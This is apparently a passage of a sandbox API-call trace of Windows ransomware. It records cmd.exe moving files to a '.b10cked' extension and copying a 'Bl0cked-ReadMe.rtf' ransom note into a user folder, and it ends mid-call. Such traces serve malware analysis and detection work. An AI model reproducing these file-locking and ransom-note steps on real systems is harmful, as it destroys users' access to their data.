[0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 [0216.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.569] GetConsoleTitleW (in: lpConsoleTitle=0x1c08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.569] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.569] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.570] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.570] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.570] _wcsicmp (_String1="move", _String2=")") returned 68 [0216.570] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0216.570] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0216.570] _wcsicmp (_String1="IF", _String2="move") returned -4 [0216.570] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0216.570] _wcsicmp (_String1="REM", _String2="move") returned 5 [0216.570] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0216.573] GetConsoleTitleW (in: lpConsoleTitle=0x16f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.573] _wcsicmp (_String1="move", _String2="DIR") 
returned 9 [0216.573] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0216.573] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CD") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="REN") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="SET") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0216.573] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="MD") returned 11 [0216.573] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0216.573] _wcsicmp (_String1="move", _String2="RD") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0216.573] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="VER") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0216.573] _wcsicmp (_String1="move", 
_String2="TITLE") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="START") returned -6 [0216.574] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0216.574] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0216.574] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0216.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f454, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f44c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f44c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 
[0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0216.576] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0216.576] _wcsicmp (_String1="EVERYW~1.SEA", _String2=".") returned 55 [0216.576] _wcsicmp (_String1="EVERYW~1.SEA", _String2="..") returned 55 [0216.576] GetFileAttributesW 
(lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA" (normalized: "c:\\users\\default\\searches\\everyw~1.sea")) returned 0x20 [0216.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1d1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", nBufferLength=0x104, lpBuffer=0x16eddc, lpFilePart=0x16edc4 | out: lpBuffer="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", lpFilePart=0x16edc4*="EVERYW~1.SEA") returned 0x26 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: "c:\\users\\default\\searches")) returned 0x11 [0216.577] _wcsicmp (_String1="EVERYW~1.SEA", _String2=".") returned 55 [0216.577] _wcsicmp (_String1="EVERYW~1.SEA", _String2="..") returned 55 [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA" (normalized: "c:\\users\\default\\searches\\everyw~1.sea")) returned 0x20 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", nBufferLength=0x104, lpBuffer=0x16f258, lpFilePart=0x16eff0 | out: lpBuffer="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", lpFilePart=0x16eff0*="EVERYW~1.SEA") returned 0x26 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x16f460, lpFilePart=0x16eff0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", lpFilePart=0x16eff0*="Everywhere.search-ms.b10cked") returned 0x36 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] 
SetLastError (dwErrCode=0x0) [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.b10cked")) returned 0xffffffff [0216.577] GetLastError () returned 0x2 [0216.578] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x16e96c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e96c) returned 0x1c0e50 [0216.578] FindNextFileW (in: hFindFile=0x1c0e50, lpFindFileData=0x16e96c | out: lpFindFileData=0x16e96c) returned 0 [0216.578] GetLastError () returned 0x12 [0216.578] FindClose (in: hFindFile=0x1c0e50 | out: hFindFile=0x1c0e50) returned 1 [0216.579] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x1d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1d1bd0) returned 0x1c0e50 [0216.579] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x16ec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", lpFilePart=0x0) returned 0x36 [0216.579] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms", nBufferLength=0x104, lpBuffer=0x16ec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpFilePart=0x0) returned 0x2e [0216.579] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms")) returned 0x20 [0216.579] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked" (normalized: 
"c:\\users\\default\\searches\\everywhere.search-ms.b10cked"), dwFlags=0x3) returned 1 [0216.580] FindClose (in: hFindFile=0x1c0e50 | out: hFindFile=0x1c0e50) returned 1 [0216.580] _vsnwprintf (in: _Buffer=0x4a375040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebb8 | out: _Buffer=" 1") returned 9 [0216.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.580] GetFileType (hFile=0x7) returned 0x2 [0216.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0216.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb44 | out: lpMode=0x16eb44) returned 1 [0216.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eb78 | out: lpConsoleScreenBufferInfo=0x16eb78) returned 1 [0216.679] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a384640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0216.679] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a384640, nSize=0x2000, Arguments=0x16ebb8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0216.679] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a384640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eb9c, lpReserved=0x0 | out: lpBuffer=0x4a384640*, lpNumberOfCharsWritten=0x16eb9c*=0x1a) returned 1 [0216.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.680] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.680] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.680] SetConsoleInputExeNameW () returned 0x1 [0216.680] GetConsoleOutputCP () returned 0x1b5 [0216.680] GetCPInfo (in: 
CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.680] exit (_Code=0) Process: id = "551" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32197 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32198 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32199 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32200 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 32201 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32202 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename 
= "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32203 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32204 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32205 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32206 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32241 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32242 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32243 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32244 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 32245 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 32246 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32247 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32248 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32249 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32250 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32251 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32252 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32253 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32254 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32255 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 32256 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
32257 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32258 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32259 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32260 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32261 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32262 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32263 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 32264 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 753 os_tid = 0xa70 [0216.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd6c | out: lpSystemTimeAsFileTime=0x1cfd6c*(dwLowDateTime=0xb5e8b320, dwHighDateTime=0x1d440a9)) [0216.600] GetCurrentProcessId () returned 0xbd8 [0216.600] GetCurrentThreadId () returned 0xa70 [0216.600] GetTickCount () returned 0x3c966 [0216.600] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd64 | out: lpPerformanceCount=0x1cfd64*=27338892654) returned 1 [0216.600] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.600] __set_app_type (_Type=0x1) [0216.600] __p__fmode () returned 0x76b331f4 [0216.600] __p__commode () returned 0x76b331fc [0216.600] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.601] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.601] GetCurrentThreadId () returned 0xa70 [0216.601] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa70) returned 0x38 [0216.601] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.601] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.601] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfcfc | out: phkResult=0x1cfcfc*=0x0) returned 0x2 [0216.601] VirtualQuery (in: lpAddress=0x1cfd33, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: 
lpAddress=0x1d0000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0216.601] GetConsoleOutputCP () returned 0x1b5 [0216.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.602] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.602] GetEnvironmentStringsW () returned 0x290168* [0216.602] FreeEnvironmentStringsW (penv=0x290168) returned 1 [0216.603] GetEnvironmentStringsW () returned 0x290168* [0216.603] FreeEnvironmentStringsW (penv=0x290168) returned 1 [0216.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec6c | out: phkResult=0x1cec6c*=0x40) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x90, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: 
lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x0, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | 